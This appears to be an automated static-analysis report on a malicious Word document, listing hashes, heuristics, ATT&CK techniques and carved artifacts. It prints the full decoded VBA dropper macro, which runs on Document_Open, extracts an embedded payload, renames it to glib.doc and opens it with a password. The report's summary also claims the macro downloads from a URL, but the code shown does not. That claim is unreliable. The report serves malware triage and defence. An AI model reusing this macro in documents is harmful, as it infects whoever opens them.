Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3b1c678b5cc55671…

MALICIOUS

Office (OLE)

431.0 KB Created: 2021-08-30 13:16:00 Authoring application: Microsoft Office Word First seen: 2021-09-17
MD5: be646244e453be783ec662bc53c0c3b6 SHA-1: 179b6adf4bb35d4d1c2a45a17bd261ef94f7df40 SHA-256: 3b1c678b5cc556715d8395639b7a140fd874642cad0f13816e03002c2bd550ef
72 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro that executes upon opening. The macro attempts to create a file named 'glib.doc' in the user's template directory and then attempts to download and execute a second-stage payload from a URL that is obfuscated within the script. The presence of the Document_Open macro and the embedded VBA code strongly suggests a macro-based attack.

Heuristics 5

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2955 bytes
SHA-256: 9f487c36b82e274d38967e56a8d06fd191f49441ba17aa6311c462af13709465
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
        Dim hdv As String
        Dim bbbb As String
        Dim med As String
Private Sub Document_Open()
Dim vcbc As String
 
Dim dfgdgdg


vcbc = Options.DefaultFilePath(wdUserTemplatesPath)
Dim fdfcc As String
fdfcc = ".d"

If Dir(vcbc & "\gl" & "ib" & fdfcc & "o" & "c") = "" Then
 Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
    Call bvxfcsd

If Len(hdv) > 2 Then

Call nam(hdv)

    Call pppx(vcbc & "\gl" & "ib.d" & "o" & "c")

    ActiveDocument.Close
End If
End If
End Sub




Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject


Call Search(MyFSO.GetFolder(asda), hdv)

End Sub


Attribute VB_Name = "Module1"


Sub pppx(spoc As String)
    Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="123321", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub



Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub



Attribute VB_Name = "Module3"

Sub bvxfcsd()
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)
Dim ewrwsdf As String
ewrwsdf = "Loc" & "a" & "l"

ewrwsdf = ewrwsdf & "/" & "Temp"
 
    ntgs = 50
sda = 49
Dim kuls As String
kuls = ewrwsdf
While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & ewrwsdf)
End Sub





Attribute VB_Name = "Module123345"
Dim pls As String


 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object
    Dim Ters As Object
  Dim fffff
  fffff = "gl" & "ib.b" & "ax"
For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc

   For Each Ters In mds.Files
   
   If Ters.Name = fffff Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub



Sub nam(pafs As String)
Call ousx
Dim oxl
oxl = "\gl" & "ib.d" & "o" & "c"
Name pafs As pls & oxl
End Sub

Sub uoia(fffs As String)
pls = fffs
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1691808959/Ole10Native 256303 bytes
SHA-256: 8a693df914d6ee4c5d112146540c1341c281a4de7388eca63d260251a81f558c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
ole10native_00_glib.bax ole-package-payload OLE Ole10Native payload: ObjectPool/_1691808959/Ole10Native; display_name=glib.bax; full_path=C:\Users\MyPc\AppData\Local\Temp\glib.bax; temp_path=; def_file= 256000 bytes
SHA-256: 03efbcefa7c95f034a3bfe3d33406f1717977b5bfe53e130d70367f2896032f1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.